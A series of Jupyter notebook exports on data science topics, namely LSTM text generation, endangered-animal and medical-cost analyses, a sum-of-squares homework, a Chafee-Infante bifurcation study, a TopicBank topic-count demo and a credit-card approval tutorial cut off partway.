metrics to claim a high correlation with human judgements of quality,[3][4] and remains one of the most popular automated and inexpensive metrics. ``` ## for calculation of bleu score from nltk.translate.bleu_score import sentence_bleu score = sentence_bleu(generated, seed_text) ``` ### 3.7.1 Deeper LSTM Model <a id='DeeperModel'></a> We will be creating a set of all of the distinct characters in the loaded document, then we will be creating a map of each character to a unique integer. ``` # load ascii text and covert to lowercase doc = load_doc(in_filename) lines = doc.split('\n') # create mapping of unique chars to integers, and a reverse mapping chars = sorted(list(set(doc))) char_to_int = dict((c, i) for i, c in enumerate(chars)) int_to_char = dict((i, c) for i, c in enumerate(chars)) ``` Summary of loaded data ``` # summarize the loaded data n_chars = len(doc) n_vocab = len(chars) print ("Total Characters: ", n_chars) print ("Total Vocab: ", n_vocab) ``` Each training pattern of the network is comprised of let say 100 time steps of one character (X) followed by one character output (y). When creating these sequences, we slide this window along the whole document one character at a time, allowing each character a chance to be learned from the 100 characters that preceded it (except the first 100 characters of course). #### Prepare the dataset of input to output pairs encoded as integers ``` # prepare the dataset of input to output pairs encoded as integers seq_length = 100 dataX = [] dataY = [] for i in range(0, n_chars - seq_length, 1): seq_in = doc[i:i + seq_length] seq_out = doc[i + seq_length] dataX.append([char_to_int[char] for char in seq_in]) dataY.append(char_to_int[seq_out]) n_patterns = len(dataX) print ("Total Patterns: ", n_patterns) ``` #### One Hot Encoding of output variable ``` # reshape X to be [samples, time steps, features] X = np.reshape(dataX, (n_patterns, seq_length, 1)) # normalize X = X / float(n_vocab) # one hot encode the output variable y = np_utils.to_categorical(dataY) ``` #### Define the LSTM model >The network is slow to train (about 300 seconds per epoch on an Nvidia K520 GPU). Because of the slowness and because of our optimization requirements, we will use model checkpointing to record all of the network weights to file each time an improvement in loss is observed at the end of the epoch. We will use the best set of weights (lowest loss) to instantiate our generative model in the next section. ``` # define the LSTM model model = Sequential() model.add(LSTM(256, input_shape=(X.shape[1], X.shape[2]))) model.add(Dropout(0.2)) model.add(Dense(y.shape[1], activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam') # define the checkpoint filepath="LSTM_Files/weights-improvement-{epoch:02d}-{loss:.4f}.hdf5" checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min') callbacks_list = [checkpoint] # fit the model model.fit(X, y, epochs=2, batch_size=128, callbacks=callbacks_list) ``` #### After running this piece of code , we will have a number of weight checkpoint files in the local directory. We can delete them all except the one with the smallest loss value. ``` # load the network weights filename = "LSTM_Files/weights-improvement-02-2.7259.hdf5" model.load_weights(filename) model.compile(loss='categorical_crossentropy', optimizer='adam') ``` #### Generate Text using deeper network (LSTM) ``` # pick a random seed start = np.random.randint(0, len(dataX)-1) pattern = dataX[start] print ("Seed:") print ("\"", ''.join([int_to_char[value] for value in pattern]), "\"") # generate characters for i in range(1000): x = np.reshape(pattern, (1, len(pattern), 1)) x = x / float(n_vocab) prediction = model.predict(x, verbose=0) index = np.argmax(prediction) result = int_to_char[index] seq_in = [int_to_char[value] for value in pattern] sys.stdout.write(result) pattern.append(index) pattern = pattern[1:len(pattern)] print ("\nDone.") ``` ![Victory](Images\GIFs\Jim_victory.gif) # <p style="text-align: center;">Conclusion<p><a id='Conclusion'></a> 1. We are not interested in the most accurate (classification accuracy) model of the training dataset. The model is the one that predicts each character in the training dataset perfectly. Instead we are interested in a generalization of the dataset that minimizes the chosen loss function. We are seeking a balance between generalization and overfitting but short of memorization. 2. As of now we are able to generate text, which seems much more gibberish but is making sense in some parts, the text generated can be tuned by adding different dense layers , building complex neuron network and by increasing epochs and decreasing the batch size. 3. Still working on BLEU and Meteor score though we are able to calculate it , it gives us a low value because the text that is being generated as of now is a bit gibberish and will yield a low value, ideally the score for BLEU should be between 0.0 to 1.0 and we got a value of 1.276854e-89, which is low , so if modeling is tweaked it may yield good results, this is still being worked upon 4. Model can also perform well , if we take a large vocab size and our input seed lenght is good enough, although time consuming, but output can vary differently if we experiment it in that way. 5. Adding weights to model with better accuracy results results in making a model (deeper and denser one better), we can keep on iterating that ways. 6. The collected data can be tested upon to find its sentiment by our third project notebook (sentiment analysis part 3) [Back to top](#Introduction) # <p style="text-align: center;">Future Scope<p><a id='Scope'></a> 1. Still working on BLEU and Meteor score though we are able to calculate it , it gives us a low value because the text that is being generated as of now is a bit gibberish and will yield a low value, ideally the score for BLEU should be between 0.0 to 1.0 and we got a value of 1.276854e-89, which is low , so if modeling is tweaked it may yield good results, this is still being worked upon 2. Train the model more by increasing the epochs & decreasing the batch size 3. Try different RNN and compare which is better 4. Try to train the data with more than 1 sources 5. Predict less characters for output 6. Do it on data collected through scraping of article websites , will yield better results 7. We can try to employ GANs , works good for image , can also be tried for texts The next part of the project is[Sentiment Analysis](Umbrella_Academy_INFO6105_Sentiment_Analysis.ipynb). Please click the link to follow to the next notebook. # <p style="text-align: center;">Contribution<p><a id='Contribution'></a> - Code by self : 60% - Code from external Sources : 40% [Back to top](#Introduction) # Citation: 1. https://github.com/abdulfatir/twitter-sentiment-analysis/blob/master/code/preprocess.py 2. https://stackoverflow.com/questions/8282553/removing-character-in-list-of-strings 3. https://github.com/bear/python-twitter/blob/master/twitter/parse_tweet.py 4. https://gist.github.com/dreikanter/2787146 5. https://docs.python.org/3.4/howto/unicode.html 6. https://www.kaggle.com/eliasdabbas/extract-entities-from-social-media-posts 7. https://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/ 8. https://machinelearningmastery.com/how-to-develop-a-word-level-neural-language-model-in-keras/ [Back to top](#Introduction) # <p style="text-align: center;">License<p><a id='License'></a> Copyright (c) 2019 Manali Sharma, Rushabh Nisher Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. [Back to top](#Introduction)
github_jupyter
``` library(tidyverse) library(skimr) #Import the new-animals_all.csv dataset into R as a dataframe, #and then Then perform the routine checks about the types of the columns, the missing values, and output a quick summary of the dataset. new_animal <- read_csv("new-animals_all.csv") new_animal %>% glimpse() new_animal %>% skim() %>% kable() #The variable named "Other Names and/or Listed subspecies" has lots of missing data. library(magrittr) # Classify Hawaii and Central America into North America, and Classify Australia into the Oceans and Island Nation. new_animal[new_animal$Area == "Hawaii",]%<>% mutate(Area = "North America") new_animal[new_animal$Area == "Central America",]%<>% mutate(Area = "North America") new_animal[new_animal$Area == "Australia",]%<>% mutate(Area = "the Oceans and Island Nations") ``` "T = threatened. ": A species likely to become endangered within the foreseeable future throughout all or a significant portion of its range.(https://www.fws.gov/endangered/about/listing-status-codes.html) "The IUCN Red List Categories define the extinction risk of species assessed. Nine categories extend from NE (Not Evaluated) to EX (Extinct). Critically Endangered (CR), Endangered (EN) and Vulnerable (VU) species are considered to be threatened with extinction. "NT :Near Threatened " "DD : Data Deficient"(https://www.iucn.org/resources/conservation-tools/iucn-red-list-threatened-species) so "T-" can classify into "NT :Near Threatened" ``` new_animal <- new_animal %>% filter(!is.na(Status)) new_animal[new_animal$Status == "T-",] %<>% mutate(Status = "NT") Status_total <- new_animal %>% group_by(Status, Area) %>% tally() %>% group_by(Area) %>% summarise(total=sum(n)) Status_total Status_Area_count <- new_animal %>% group_by(Status, Area) %>% tally() Status_Area_combine <- Status_Area_count %>% full_join(Status_total, by = "Area") Status_Area_combine Status_Area_combine$Status <- as_factor(Status_Area_combine$Status) Status_Area_combine$Status %>% class Status_Area_combine$Status <- factor(Status_Area_combine$Status, levels = c("NT", "DD", "VU", "EN", "CR")) animal_plot <- Status_Area_combine %>% ggplot() + geom_bar(aes(x=Area, y=n/total, fill=Status),stat="identity")+ scale_fill_brewer(palette="OrRd") + ggtitle("Proportion of Endangered Animal Count in each Region Status") + labs(y="proportion", x = "continent") + coord_flip() animal_plot ggsave(animal_plot,filename = "Animal plot.pdf",width = 12,height = 9) Status_total$Area <-as.factor(Status_total$Area) Status_total <- Status_total %>% mutate(proportion = total/sum(total)) %>% arrange(desc(proportion)) #reorder origin by ascending count Status_total$Area <- reorder(Status_total$Area, Status_total$proportion) animal_plot2 <- Status_total %>% ggplot(aes(x="", y=proportion, fill=Area))+ geom_bar(width = 1, stat = "identity", color = "white") + coord_polar("y", start=0) + scale_fill_brewer(palette="OrRd") + ggtitle("Proportion of Endangered Animal Count in each Region") + theme(plot.title = element_text(hjust = 0.5), axis.title.x =element_blank()) animal_plot2 ggsave(animal_plot2,filename = "Animal pie chart.pdf",width = 12,height = 9) ```
github_jupyter
Before you turn this problem in, make sure everything runs as expected. First, **restart the kernel** (in the menubar, select Kernel$\rightarrow$Restart) and then **run all cells** (in the menubar, select Cell$\rightarrow$Run All). Make sure you fill in any place that says `YOUR CODE HERE` or "YOUR ANSWER HERE", as well as your name and collaborators below: ``` NAME = "Alyssa P. Hacker" COLLABORATORS = "Ben Bitdiddle" ``` --- For this problem set, we'll be using the Jupyter notebook: ![](jupyter.png) --- ## Part A (2 points) Write a function that returns a list of numbers, such that $x_i=i^2$, for $1\leq i \leq n$. Make sure it handles the case where $n<1$ by raising a `ValueError`. ``` def squares(n): """Compute the squares of numbers from 1 to n, such that the ith element of the returned list equals i^2. """ if n < 1: raise ValueError return [i ** 2 for i in range(1, n + 1)] ``` Your function should print `[1, 4, 9, 16, 25, 36, 49, 64, 81, 100]` for $n=10$. Check that it does: ``` squares(10) """Check that squares returns the correct output for several inputs""" assert squares(1) == [1] assert squares(2) == [1, 4] assert squares(10) == [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] assert squares(11) == [1, 4, 9, 16, 25, 36, 49, 64, 81, 100, 121] """Check that squares raises an error for invalid inputs""" try: squares(0) except ValueError: pass else: raise AssertionError("did not raise") try: squares(-4) except ValueError: pass else: raise AssertionError("did not raise") ``` --- ## Part B (1 point) Using your `squares` function, write a function that computes the sum of the squares of the numbers from 1 to $n$. Your function should call the `squares` function -- it should NOT reimplement its functionality. ``` def sum_of_squares(n): """Compute the sum of the squares of numbers from 1 to n.""" return sum(squares(n)) ``` The sum of squares from 1 to 10 should be 385. Verify that this is the answer you get: ``` sum_of_squares(10) """Check that sum_of_squares returns the correct answer for various inputs.""" assert sum_of_squares(1) == 1 assert sum_of_squares(2) == 5 assert sum_of_squares(10) == 385 assert sum_of_squares(11) == 506 """Check that sum_of_squares relies on squares.""" orig_squares = squares del squares try: sum_of_squares(1) except NameError: pass else: raise AssertionError("sum_of_squares does not use squares") finally: squares = orig_squares ``` --- ## Part C (1 point) Using LaTeX math notation, write out the equation that is implemented by your `sum_of_squares` function. $\sum_{i=1}^n i^2$ --- ## Part D (2 points) Find a usecase for your `sum_of_squares` function and implement that usecase in the cell below. ``` import math def hypotenuse(n): """Finds the hypotenuse of a right triangle with one side of length n and the other side of length n-1.""" # find (n-1)**2 + n**2 if (n < 2): raise ValueError("n must be >= 2") elif n == 2: sum1 = 5 sum2 = 0 else: sum1 = sum_of_squares(n) sum2 = sum_of_squares(n-2) return math.sqrt(sum1 - sum2) print(hypotenuse(2)) print(math.sqrt(2**2 + 1**2)) print(hypotenuse(10)) print(math.sqrt(10**2 + 9**2)) ``` --- ## Part E (4 points) State the formulae for an arithmetic and geometric sum and verify them numerically for an example of your choice. $\sum x^i = \frac{1}{1-x}$
github_jupyter
## Fares Joni's Reasearch Questions 1. BMI of Gender in relation to Tobacco Users 2. Medical charges of Tobacco Users in relation to Age ##### Import data in from clean spreadsheet ``` import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import os from Jscripts.project_functions.function import load_and_process df = load_and_process(r"C:\Users\fares\Documents\GitHub\course-project-group_1015\analysis\Johnny\Medical_Cost.csv") df.head(10) ``` #### Allowing data to read the Medical Costs per region since $ gives error when analyzing ``` df1 = df.copy() df1['Medical Costs per region'] = df1['Medical Costs per region'].str.replace('$','') df1['Medical Costs per region'] = df1['Medical Costs per region'].astype(float) ``` #### return the info ``` df.info() ``` #### Describe the data ``` df.describe() # ``` #### check for missing values "NA/0" in Data ``` df.isnull().sum() ``` #### show columns within Data ``` df.columns ``` #### calculate correlation between varibles ``` df.corr() ``` #### heatmap to visualize the correlation between functions within the raw data. Numbers close to 1.0 will have a brighter colour. ``` f,ax = plt.subplots(figsize = (15,15)) sns.heatmap(df.corr(), annot=True, linewidths=.5, fmt='.1f', ax=ax) plt.show() ``` #### Heatmap but in winter format that looks cool ``` plt.figure(figsize=(8,6)) sns.heatmap(df.corr(),annot=True,cmap="winter_r") plt.show() ``` #### Show unique values for each variable ``` df.nunique(axis=0) ``` #### Displot to show the Age ``` sns.displot(df['Age']) ``` #### Displot to show the Children ``` sns.displot(df['Children']) ``` #### Displot to show the BMI ``` sns.displot(df['BMI']) ``` #### Barplot to show the Age in comparison to the BMI ``` sns.barplot(x = 'Age', y = 'BMI', data = df) ``` #### Pairplot to show various outcomes ``` sns.pairplot(data=df.iloc[:,:],corner=True) ``` #### Lineplot to show the Age and BMI comparison ``` df.BMI.plot(kind='line', color='g', label='BMI', linewidth=1, alpha=0.5, grid=True, linestyle='-') df.Age.plot(kind='line', color='r', label='Age', linewidth=1, alpha=0.5, grid=True, linestyle=':') plt.legend('upper left') plt.xlabel('Age') plt.ylabel('children') plt.title('Line Plot') plt.show() ``` #### Violinplot to show the Age and Gender comparison in regards to Tobacco Users ``` sns.violinplot(data=df, y='Age', x='Gender', hue='Tobacco User') ``` #### As shown in the above graph, the increase of age leads to an increase in medical costs #### Boxplot to show the BMI and Medical Costs per region comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="BMI", x="Medical Costs per region", hue="Tobacco User") ``` #### Boxplot to show the BMI and Age ``` df.boxplot(column='Age',by = 'BMI') ``` #### Boxplot to show the BMI and Age comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="Age", x="BMI", hue="Tobacco User") ``` #### Boxplot to show the Medical Costs per region and Age comparison in regards to Tobacco Users ``` sns.boxplot(data=df, y="Age", x="Medical Costs per region", hue="Tobacco User") ``` #### Boxplot of Age in regards to having Children ``` df.boxplot(column='Age',by = 'Children') ``` #### Histogram to analyze the Age ``` df.Age.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() ``` #### Cleaning data for Female smokers ``` df3=(df['Gender']=='female') & (df['Tobacco User']=='yes') & (df['Children']>0) df[df3] ``` #### Cleaning data for male smokers ``` df3=(df['Gender']=='male') & (df['Tobacco User']=='yes') & (df['Children']>0) df[df3] ``` #### The data above shows that there are more Male smokers than female smokers #### Renaming Gender and Male to furter analyze ``` df1=df['Gender']=='female' df_female=df[df1] df2=df['Gender']=='male' df_male=df[df2] #df3=df['Medical Costs per region']=='charges' #df_charges=df[df3] ``` #### historgram to show male BMI's ``` df_male.BMI.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() #### historgram to show female BMI's df_female.BMI.plot(kind='hist', bins=50, figsize=(10,10)) plt.show() ``` #### Females tend to have lower BMI than male BMI's as there are greater number of Male smokers, which lead to a health deficit.
github_jupyter
# Chafee-Infante方程式の離散化 ``` import numpy as np import pathfollowing as pf import matplotlib.pyplot as plt import seaborn as sns %matplotlib inline sns.set('poster', 'whitegrid', 'dark', rc={"lines.linewidth": 2, 'grid.linestyle': '-'}) N = 16 ds = np.pi / N def func(x, a): n = len(x) A = np.zeros(n) A = 2 * np.identity(n) for m in range(n-1): A[m,m+1] = -1.0 A[m+1,m] = -1.0 return A @ x - (ds**2) * (a[0] * x - x**3/3) def dfdx(x, a): n = len(x) A = 2 * np.identity(n) for m in range(n-1): A[m,m+1] = -1.0 A[m+1,m] = -1.0 for m in range(n): A[m,m] -= (ds**2) * (a[0] - x[m]**2) return A def dfda(x,a): return np.array([[-(ds**2) * y for y in x]]) x=np.zeros(N) a=np.array([0.5]) bd,bp,lp=pf.pathfollow(x, a, func, dfdx, dfda,nmax=800, h=0.05, epsr=1.0e-14, epsb=1.0e-14, quiet=True) for i in bp: print(i,bd[i]['a'], bd[i+1]['a']) v02 = pf.calcSwitchingVectorBP(bd[bp[0]], func, dfdx, dfda) x02=bd[bp[0]]['x'] a02=bd[bp[0]]['a'] bd02,bp02,lp02=pf.pathfollow(x02, a02, func, dfdx, dfda, w=v02, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v12 = pf.calcSwitchingVectorBP(bd[bp[1]], func, dfdx, dfda) x12=bd[bp[1]]['x'] a12=bd[bp[1]]['a'] bd12,bp12,lp12=pf.pathfollow(x12, a12, func, dfdx, dfda, w=v12, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v22 = pf.calcSwitchingVectorBP(bd[bp[2]], func, dfdx, dfda) x22=bd[bp[2]]['x'] a22=bd[bp[2]]['a'] bd22,bp22,lp22=pf.pathfollow(x22, a22, func, dfdx, dfda, w=v22, nmax=1000, h=0.05, epsr=1.0e-10, epsb=1.0e-10, quiet=True) v32 = pf.calcSwitchingVectorBP(bd[bp[3]], func, dfdx, dfda) x32=bd[bp[3]]['x'] a32=bd[bp[3]]['a'] bd32,bp32,lp32=pf.pathfollow(x32, a32, func, dfdx, dfda, w=v32, nmax=1000, h=0.1, epsr=1.0e-10, epsb=1.0e-10, quiet=True) bd_r = np.array([bd[m]['a'][0] for m in range(len(bd))]) bd_x = np.array([np.linalg.norm(bd[m]['x']) for m in range(len(bd))]) bd_r02 = np.array([bd02[m]['a'][0] for m in range(len(bd02))]) bd_x02 = np.array([np.linalg.norm(bd02[m]['x']) for m in range(len(bd02))]) bd_r12 = np.array([bd12[m]['a'][0] for m in range(len(bd12))]) bd_x12 = np.array([np.linalg.norm(bd12[m]['x']) for m in range(len(bd12))]) bd_r22 = np.array([bd22[m]['a'][0] for m in range(len(bd22))]) bd_x22 = np.array([np.linalg.norm(bd22[m]['x']) for m in range(len(bd22))]) bd_r32 = np.array([bd32[m]['a'][0] for m in range(len(bd32))]) bd_x32 = np.array([np.linalg.norm(bd32[m]['x']) for m in range(len(bd32))]) print(bd_r32, bd_x32) fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) ax.set_xlim(0,20) ax.set_ylim(-2, 30) ax.set_xlabel(r"$\lambda$") ax.set_ylabel("$\max(u)$") ax.plot(bd_r, bd_x, '-k') ax.plot(bd_r02, bd_x02, '-r') ax.plot(bd_r12, bd_x12, '-b') ax.plot(bd_r22, bd_x22, '-k') ax.plot(bd_r32, bd_x32, '-r') ```
github_jupyter
# TopicBank Demo The notebook contains a demonstration of the [TopicBank approach](https://github.com/machine-intelligence-laboratory/OptimalNumberOfTopics/tree/master/topnum/search_methods/topic_bank) for finding an appropriate number of topics. Dataset used for demonstration is [20 Newsgroups](http://qwone.com/~jason/20Newsgroups/), preprocessed in a way described in the notebook [Making-Decorrelation-and-Topic-Selection-Friends.ipynb](https://github.com/machine-intelligence-laboratory/TopicNet/blob/master/topicnet/demos/Making-Decorrelation-and-Topic-Selection-Friends.ipynb). ``` # General imports import numpy as np import os from scipy.stats import gaussian_kde from matplotlib import pyplot as plt %matplotlib inline # Making `topnum` module visible for Python import sys sys.path.insert(0, '..') # Optimal number of topics from topnum.data.vowpal_wabbit_text_collection import VowpalWabbitTextCollection from topnum.search_methods import TopicBankMethod ``` ## Data In the folder below must reside the necessary data file in Vowpal Wabbit format. ``` DATA_FOLDER_PATH = 'data' os.listdir(DATA_FOLDER_PATH) vw_file_path = os.path.join( DATA_FOLDER_PATH, 'twenty_newsgroups__vw__natural_order.txt' ) ``` Checking if all OK with data, what modalities does the collection have. ``` ! head -n 7 $vw_file_path ``` Defining a text collection entity, which is to be passed to topic number search method later: ``` text_collection = VowpalWabbitTextCollection( vw_file_path, main_modality='@text' ) ``` Let's transform this collection to the TopicNet's Dataset (so as to look at it more easily). ``` dataset = text_collection._to_dataset() dataset._data.shape dataset._data.head() ``` The searching method itself. It has several parameters: some are specific for the renormalization approach, some are common for all the search methods presented in `topnum` module. ``` optimizer = TopicBankMethod( data = dataset, # `text_collection` also would be fine here min_df_rate=0.001, # excluding too rare words from text collection's vocabulary max_num_models = 100, # number of models for collecting topics one_model_num_topics = 100, # number of topics in one model num_fit_iterations = 100, # 100 or 200 surely might be enough topic_score_threshold_percentile = 90 # 10% of the best model topics according to the score are going to be considered as good ) ``` Fulfilling the search: ``` %%time optimizer.search_for_optimum(text_collection) ``` The search method's result may be accessed as `optimizer._result`. Let's see what is available here: ``` list(optimizer._result.keys()) ``` Point estimate of the number of topics and standard deviation (std) over the restarts (`num_restarts`): ``` result_key_optimum = 'optimum' result_key_optimum_std = 'optimum_std' print( f'Optimum: {optimizer._result[result_key_optimum]} topics.' + f' Std: {optimizer._result[result_key_optimum_std]}' ) ``` The number of topics appeared to be $20$! So, the method worked pretty well for this particular dataset. ``` result_key_bank_scores = 'bank_scores' result_key_bank_topic_scores = 'bank_topic_scores' result_key_model_scores = 'model_scores' result_key_model_topic_scores = 'model_topic_scores' print( 'Num iterations:', len(optimizer._result[result_key_bank_scores]) ) print( '...same as:', len(optimizer._result[result_key_model_scores]) ) print( '...and:', len(optimizer._result[result_key_model_topic_scores]) ) print( 'Final number of topics:', len(optimizer._result[result_key_bank_topic_scores]) ) ``` Let us look at the first elements in the result values: ``` # Scores for the bank as topic model list(optimizer._result[result_key_bank_scores])[0] # Averaged scores for bank topics for the particular iteration list(optimizer._result[result_key_bank_topic_scores])[0] # Scores for the model trained during the iteration list(optimizer._result[result_key_model_scores])[0] # Scores for each topic of the current model list(optimizer._result[result_key_model_topic_scores])[0][:3] ``` Using the saved scores one may analyze the process. For example, how the perplexity changes for the bank during its creation: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_bank_scores]))) y = [s['perplexity_score'] for s in optimizer._result[result_key_bank_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of models)') ax.set_ylabel('Perplexity') ax.grid(True) plt.show() ``` And the perplexity for ordinary models: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_model_scores]))) y = [s['perplexity_score'] for s in optimizer._result[result_key_model_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of models)') ax.set_ylabel('Perplexity of the model') ax.grid(True) plt.show() ``` And another score worth looking at — topic coherence (for example, intratext), as a measure of topic interpretability: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) score_name = 'intratext_coherence_score' x = range(len(list(optimizer._result[result_key_bank_topic_scores]))) y_bank = [ s[score_name] for s in optimizer._result[result_key_bank_topic_scores] ] y_model = [ s[score_name] for model_scores in optimizer._result[result_key_model_topic_scores] for s in model_scores ] y_model = [v if v is not None else 0.0 for v in y_model] gauss_for_bank = gaussian_kde(y_bank) gauss_for_models = gaussian_kde(y_model) x = np.arange(-0.01, 0.2, 0.001) ax.plot(x, gauss_for_bank(x), color='b', lw=5, label='topic bank') ax.plot(x, gauss_for_models(x), color='r', lw=5, label='ordinary model') ax.set_xlabel('Coherence value') ax.set_ylabel('KDE') ax.legend() ax.grid(True) plt.show() ``` Distance of newly added topic to the nearest topic already in the bank: ``` fig, ax = plt.subplots(1, 1, figsize=(12, 8)) x = range(len(list(optimizer._result[result_key_bank_topic_scores]))) y = [s['distance_to_nearest'] for s in optimizer._result[result_key_bank_topic_scores]] ax.scatter(x, y, s=100) ax.set_xlabel('Iteration (number of models)') ax.set_ylabel('Perplexity of the model') ax.grid(True) plt.show() ``` As the bank growths, this distance value shrinks.
github_jupyter
## 1. Credit card applications <p>Commercial banks receive <em>a lot</em> of applications for credit cards. Many of them get rejected for many reasons, like high loan balances, low income levels, or too many inquiries on an individual's credit report, for example. Manually analyzing these applications is mundane, error-prone, and time-consuming (and time is money!). Luckily, this task can be automated with the power of machine learning and pretty much every commercial bank does so nowadays. In this notebook, we will build an automatic credit card approval predictor using machine learning techniques, just like the real banks do.</p> ![title](datasets/credit_card.jpg) <p>We'll use the <a href="http://archive.ics.uci.edu/ml/datasets/credit+approval">Credit Card Approval dataset</a> from the UCI Machine Learning Repository. The structure of this notebook is as follows:</p> <ul> <li>First, we will start off by loading and viewing the dataset.</li> <li>We will see that the dataset has a mixture of both numerical and non-numerical features, that it contains values from different ranges, plus that it contains a number of missing entries.</li> <li>We will have to preprocess the dataset to ensure the machine learning model we choose can make good predictions.</li> <li>After our data is in good shape, we will do some exploratory data analysis to build our intuitions.</li> <li>Finally, we will build a machine learning model that can predict if an individual's application for a credit card will be accepted.</li> </ul> <p>First, loading and viewing the dataset. We find that since this data is confidential, the contributor of the dataset has anonymized the feature names.</p> ``` # Import pandas # ... YOUR CODE FOR TASK 1 ... import pandas as pd # Load dataset cc_apps = pd.read_csv('datasets/cc_approvals.data', header = None) # Inspect data # ... YOUR CODE FOR TASK 1 ... cc_apps.head() ``` ## 2. Inspecting the applications <p>The output may appear a bit confusing at its first sight, but let's try to figure out the most important features of a credit card application. The features of this dataset have been anonymized to protect the privacy, but <a href="http://rstudio-pubs-static.s3.amazonaws.com/73039_9946de135c0a49daa7a0a9eda4a67a72.html">this blog</a> gives us a pretty good overview of the probable features. The probable features in a typical credit card application are <code>Gender</code>, <code>Age</code>, <code>Debt</code>, <code>Married</code>, <code>BankCustomer</code>, <code>EducationLevel</code>, <code>Ethnicity</code>, <code>YearsEmployed</code>, <code>PriorDefault</code>, <code>Employed</code>, <code>CreditScore</code>, <code>DriversLicense</code>, <code>Citizen</code>, <code>ZipCode</code>, <code>Income</code> and finally the <code>ApprovalStatus</code>. This gives us a pretty good starting point, and we can map these features with respect to the columns in the output. </p> <p>As we can see from our first glance at the data, the dataset has a mixture of numerical and non-numerical features. This can be fixed with some preprocessing, but before we do that, let's learn about the dataset a bit more to see if there are other dataset issues that need to be fixed.</p> ``` # Print summary statistics cc_apps_description = cc_apps.describe() print(cc_apps_description) print("\n") # Print DataFrame information cc_apps_info = cc_apps.info() print(cc_apps_info) print("\n") # Inspect missing values in the dataset # ... YOUR CODE FOR TASK 2 ... cc_apps.tail(17) ``` ## 3. Handling the missing values (part i) <p>We've uncovered some issues that will affect the performance of our machine learning model(s) if they go unchanged:</p> <ul> <li>Our dataset contains both numeric and non-numeric data (specifically data that are of <code>float64</code>, <code>int64</code> and <code>object</code> types). Specifically, the features 2, 7, 10 and 14 contain numeric values (of types float64, float64, int64 and int64 respectively) and all the other features contain non-numeric values.</li> <li>The dataset also contains values from several ranges. Some features have a value range of 0 - 28, some have a range of 2 - 67, and some have a range of 1017 - 100000. Apart from these, we can get useful statistical information (like <code>mean</code>, <code>max</code>, and <code>min</code>) about the features that have numerical values. </li> <li>Finally, the dataset has missing values, which we'll take care of in this task. The missing values in the dataset are labeled with '?', which can be seen in the last cell's output.</li> </ul> <p>Now, let's temporarily replace these missing value question marks with NaN.</p> ``` # Import numpy # ... YOUR CODE FOR TASK 3 ... import numpy as np # Inspect missing values in the dataset print(cc_apps.tail(17)) # Replace the '?'s with NaN cc_apps = cc_apps.replace('?', np.NaN) print('\n\n') # Inspect the missing values again # ... YOUR CODE FOR TASK 3 ... print(cc_apps.tail(17)) ``` ## 4. Handling the missing values (part ii) <p>We replaced all the question marks with NaNs. This is going to help us in the next missing value treatment that we are going to perform.</p> <p>An important question that gets raised here is <em>why are we giving so much importance to missing values</em>? Can't they be just ignored? Ignoring missing values can affect the performance of a machine learning model heavily. While ignoring the missing values our machine learning model may miss out on information about the dataset that may be useful for its training. Then, there are many models which cannot handle missing values implicitly such as LDA. </p> <p>So, to avoid this problem, we are going to impute the missing values with a strategy called mean imputation.</p> ``` # Impute the missing values with mean imputation cc_apps.fillna(cc_apps.mean(), axis = 0, inplace=True) # Count the number of NaNs in the dataset to verify # ... YOUR CODE FOR TASK 4 ... print(cc_apps.isna().sum()) ``` ## 5. Handling the missing values (part iii) <p>We have successfully taken care of the missing values present in the numeric columns. There are still some missing values to be imputed for columns 0, 1, 3, 4, 5, 6 and 13. All of these columns contain non-numeric data and this why the mean imputation strategy would not work here. This needs a different treatment. </p> <p>We are going to impute these missing values with the most frequent values as present in the respective columns. This is <a href="https://www.datacamp.com/community/tutorials/categorical-data">good practice</a> when it comes to imputing missing values for categorical data in general.</p> ``` cc_apps[1].dtype cc_apps.describe(exclude = 'number') cc_apps[3].value_counts().index[0] # Iterate over each column of cc_apps for col in cc_apps.columns: # Check if the column is of object type if cc_apps[col].dtype == 'object': # Impute with the most frequent value cc_apps = cc_apps.fillna(cc_apps[col].value_counts().index[0]) # Count the number of NaNs in the dataset and print the counts to verify # ... YOUR CODE FOR TASK 5 ... print(cc_apps.isna().sum()) ``` ## 6. Preprocessing the data (part i) <p>The missing values are now successfully handled.</p> <p>There is still some minor but essential data preprocessing needed before we proceed towards building our machine learning model. We are going to divide these remaining preprocessing steps into three main tasks:</p> <ol> <li>Convert the non-numeric data into numeric.</li> <li>Split the data into train and test sets. </li> <li>Scale the feature values to a uniform range.</li> </ol> <p>First, we will be converting all the non-numeric values into numeric ones. We do this because not only it results in a faster computation but also many machine learning models (like XGBoost) (and especially the ones developed using scikit-learn) require the data to be in a strictly numeric format. We will do this by using a 